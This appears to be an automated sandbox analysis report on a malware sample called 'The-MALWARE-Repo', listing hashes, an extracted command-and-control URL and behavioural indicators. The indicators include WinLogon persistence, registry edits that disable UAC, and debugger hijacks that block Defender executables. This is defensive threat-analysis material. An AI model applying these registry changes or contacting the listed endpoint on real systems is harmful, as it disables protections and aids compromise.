Resubmissions
29-06-2024 07:53
240629-jrbzwatdqe 1029-06-2024 07:51
240629-jpsvlswgrn 529-06-2024 07:48
240629-jnc3rswgqk 329-06-2024 07:37
240629-jf3y8atcpa 1029-06-2024 07:36
240629-je8s3stcnd 829-06-2024 07:34
240629-jd4gzawfqq 129-06-2024 07:33
240629-jdq7mstcld 129-06-2024 07:29
240629-jbarwawfnj 7Analysis
-
max time kernel
585s -
max time network
588s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
29-06-2024 07:37
Static task
static1
Behavioral task
behavioral1
Sample
The-MALWARE-Repo
Resource
win11-20240611-en
Errors
General
-
Target
The-MALWARE-Repo
-
Size
284KB
-
MD5
1c0a02c3390b9fd77746574def84b1d1
-
SHA1
2e62ae7936cf5b6398308f702ddbb06427091109
-
SHA256
29dc64e0ada4c711d0452801d3364b2f44cf4bd52337547aaa2f40744da97cd1
-
SHA512
4f62bc5c219a6fa412dc06653227561b10cb32d144be733e0b2e57dea24baa17683dc09b84c57237326e6909e27f42ea7e1f70032eeff455d12423364bc433a2
-
SSDEEP
6144:ibRoQ02n9dH5M2vkm0y3Cl3pId9Rj9vvZJT3CqbMrhryfQNRPaCieMjAkvCJv1VZ:qRoQ02n9dH5M2vkm0y3Cl3pId9Rj9vvC
Malware Config
Extracted
http://93.115.82.248/?0=1&1=1&2=9&3=i&4=9200&5=1&6=1111&7=nnnpgxdtai
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\guard-dpjq.exe" guard-dpjq.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-dpjq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-dpjq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-dpjq.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 125 6096 mshta.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\Debugger = "svchost.exe" guard-dpjq.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe guard-dpjq.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" guard-dpjq.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "svchost.exe" guard-dpjq.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe guard-dpjq.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger = "svchost.exe" guard-dpjq.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\Debugger = "svchost.exe" guard-dpjq.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe guard-dpjq.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe guard-dpjq.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" guard-dpjq.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe guard-dpjq.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe guard-dpjq.exe -
Executes dropped EXE 1 IoCs
pid Process 5844 guard-dpjq.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-dpjq.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 5 camo.githubusercontent.com 54 camo.githubusercontent.com 3 camo.githubusercontent.com 4 camo.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 121 checkip.dyndns.org -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\services.msc guard-dpjq.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc guard-dpjq.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc guard-dpjq.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "5" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\officeclicktorun OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ExternalFeatureOverrides\officeclicktorun OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ OfficeClickToRun.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings firefox.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\Users\Admin\Downloads\MalwareDatabase-master.zip:Zone.Identifier firefox.exe File created C:\Users\Admin\AppData\Roaming\guard-dpjq.exe\:Zone.Identifier:$DATA [email protected] -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 2808 vlc.exe 5868 WINWORD.EXE 5868 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5736 msedge.exe 5736 msedge.exe 3008 msedge.exe 3008 msedge.exe 5536 msedge.exe 5536 msedge.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 2808 vlc.exe 2116 [email protected] -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 5736 msedge.exe 5736 msedge.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 3776 firefox.exe Token: SeDebugPrivilege 3776 firefox.exe Token: SeDebugPrivilege 3776 firefox.exe Token: SeDebugPrivilege 3776 firefox.exe Token: SeDebugPrivilege 3776 firefox.exe Token: SeDebugPrivilege 3776 firefox.exe Token: SeDebugPrivilege 3776 firefox.exe Token: SeDebugPrivilege 6072 taskmgr.exe Token: SeSystemProfilePrivilege 6072 taskmgr.exe Token: SeCreateGlobalPrivilege 6072 taskmgr.exe Token: 33 6072 taskmgr.exe Token: SeIncBasePriorityPrivilege 6072 taskmgr.exe Token: SeDebugPrivilege 3776 firefox.exe Token: SeRestorePrivilege 5592 7zG.exe Token: 35 5592 7zG.exe Token: SeSecurityPrivilege 5592 7zG.exe Token: SeSecurityPrivilege 5592 7zG.exe Token: SeDebugPrivilege 3776 firefox.exe Token: SeDebugPrivilege 5844 guard-dpjq.exe Token: SeShutdownPrivilege 5844 guard-dpjq.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2808 vlc.exe 2808 vlc.exe 2808 vlc.exe 2808 vlc.exe 2808 vlc.exe 2808 vlc.exe 2808 vlc.exe 2808 vlc.exe 2808 vlc.exe 3776 firefox.exe 3776 firefox.exe 3776 firefox.exe 3776 firefox.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2808 vlc.exe 2808 vlc.exe 2808 vlc.exe 2808 vlc.exe 2808 vlc.exe 2808 vlc.exe 2808 vlc.exe 2808 vlc.exe 3776 firefox.exe 3776 firefox.exe 3776 firefox.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 5736 msedge.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe 6072 taskmgr.exe -
Suspicious use of SetWindowsHookEx 24 IoCs
pid Process 2808 vlc.exe 3776 firefox.exe 3776 firefox.exe 3776 firefox.exe 3776 firefox.exe 3776 firefox.exe 3776 firefox.exe 3776 firefox.exe 5868 WINWORD.EXE 5868 WINWORD.EXE 5868 WINWORD.EXE 5868 WINWORD.EXE 5868 WINWORD.EXE 5868 WINWORD.EXE 5868 WINWORD.EXE 3776 firefox.exe 3776 firefox.exe 3776 firefox.exe 3504 [email protected] 5844 guard-dpjq.exe 5844 guard-dpjq.exe 3716 LogonUI.exe 5656 OfficeClickToRun.exe 5000 OfficeClickToRun.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4708 wrote to memory of 3776 4708 firefox.exe 88 PID 4708 wrote to memory of 3776 4708 firefox.exe 88 PID 4708 wrote to memory of 3776 4708 firefox.exe 88 PID 4708 wrote to memory of 3776 4708 firefox.exe 88 PID 4708 wrote to memory of 3776 4708 firefox.exe 88 PID 4708 wrote to memory of 3776 4708 firefox.exe 88 PID 4708 wrote to memory of 3776 4708 firefox.exe 88 PID 4708 wrote to memory of 3776 4708 firefox.exe 88 PID 4708 wrote to memory of 3776 4708 firefox.exe 88 PID 4708 wrote to memory of 3776 4708 firefox.exe 88 PID 4708 wrote to memory of 3776 4708 firefox.exe 88 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 4788 3776 firefox.exe 89 PID 3776 wrote to memory of 2924 3776 firefox.exe 90 PID 3776 wrote to memory of 2924 3776 firefox.exe 90 PID 3776 wrote to memory of 2924 3776 firefox.exe 90 PID 3776 wrote to memory of 2924 3776 firefox.exe 90 PID 3776 wrote to memory of 2924 3776 firefox.exe 90 PID 3776 wrote to memory of 2924 3776 firefox.exe 90 PID 3776 wrote to memory of 2924 3776 firefox.exe 90 PID 3776 wrote to memory of 2924 3776 firefox.exe 90 PID 3776 wrote to memory of 2924 3776 firefox.exe 90 PID 3776 wrote to memory of 2924 3776 firefox.exe 90 -
System policy modification 1 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System guard-dpjq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-dpjq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-dpjq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-dpjq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" guard-dpjq.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\The-MALWARE-Repo1⤵PID:2436
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:776
-
